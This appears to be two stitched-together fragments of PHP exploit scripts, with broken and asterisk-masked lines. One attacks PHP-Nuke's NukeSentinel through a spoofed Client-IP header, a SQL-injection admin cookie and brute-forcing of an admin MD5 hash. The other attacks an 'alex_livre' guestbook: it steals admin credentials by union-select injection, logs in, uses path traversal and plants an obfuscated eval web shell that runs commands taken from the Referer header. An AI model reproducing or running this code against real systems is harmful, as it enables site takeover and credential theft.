# '".$nsnst_const['remote_port']."', '".$nsnst_const['request_method']."', '$c2c')"); # # We insert a row in $prefix."_nsnst_tracked_ips". # print "\nInserting a row in {$prfix}_nsnst_tracked_ips"; $xpl->addheader("Client-IP", "255.255.255.255"); $xpl->get($url . 'index.php'); # Trying to find a valid tid. # Needed for $tum > 0. # print "\nTrying to find a valid tid (max hits={$nbtst})"; $sql = "' OR 1=1#"; $xpl->addcookie("admin", urlencode(base64_encode($sql . ':1:'))); for ($c = $tid; $c <= $nbtst; $c++) { $xpl->get($url . "includes/nsbypass.php?tid={$c}"); if (!preg_match("#phpnuke.org#", $xpl->getheader())) { $tid = $c; print "\nValid tid found: {$tid}\nHash: {$login} -> "; break; } if ($c == $nbtst) { exit("\n#1 Exploit failed"); } } # MD5 hash length [32] # for ($a = 1; $a <= 32; $a++) { # MD5 charset [a-f0-9] # for ($b = 48; $b <= 71; $b++) { # +nsbypass.php
| // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre` | /*/ $sql = "index.php?lang=english.php%00'%20union%20select%20" . "concat('XPLLogin:'******'XPLPass:'******'#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#', $xpl->getcontent(), $count)) { print "\nsploit> AdminUsername::" . $count[1] . "\nsploit> AdminPassword::" . $count[2]; } else { die("\nsploit> Exploit failed"); } print "\nstatus> Trying to get logged in"; $xpl->post($url . "admin/index.php", "f_login="******"&f_pass="******"&f_identif=Identification"); if (preg_match("#f_cadres\\.php\\?f_sid=([a-z0-9]{32})#", $xpl->getheader(), $sid)) { print "\nsploit> Done"; } else { die("\nsploit> Exploit failed"); } print "\nstatus> Trying to add a skin"; // skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755) $xpl->post($url . "admin/skins.php?f_sid=" . $sid[1], "aj_skin=../../languages/d4h4x0rskin&ajouter=Ajouter"); if (!preg_match('#alert\\("ERREUR\\n#', $xpl->getcontent())) { print "\nsploit> Done"; } else { die("\nsploit> Exploit failed"); } $scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d)." . "chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70)." . "chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65)." . "chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x53).chr(0x45)." . "chr(0x52).chr(0x56).chr(0x45).chr(0x52).chr(0x5b).chr(0x27)." . "chr(0x48).chr(0x54).chr(0x54).chr(0x50).chr(0x5f).chr(0x52)." . "chr(0x45).chr(0x46).chr(0x45).chr(0x52).chr(0x45).chr(0x52)." . "chr(0x27).chr(0x5d).chr(0x29).chr(0x29).chr(0x3b)"; $data = "skin_edit=skins.php%3Ff_sid%3D" . $sid[1] . "%26skin_edit" . "%3D../../languages/d4h4x0rskin&alex_livre=<?php\r\n@e" . "val({$scode});exit(0);\r\n?>&add_message=&nb_message_pa" . "ge=&list_pages=&corps_messages=&space=&assembly=&enre" . "gistrer=Enregistrer"; print "\nstatus> Writing the malicious skin\n\$shell> ";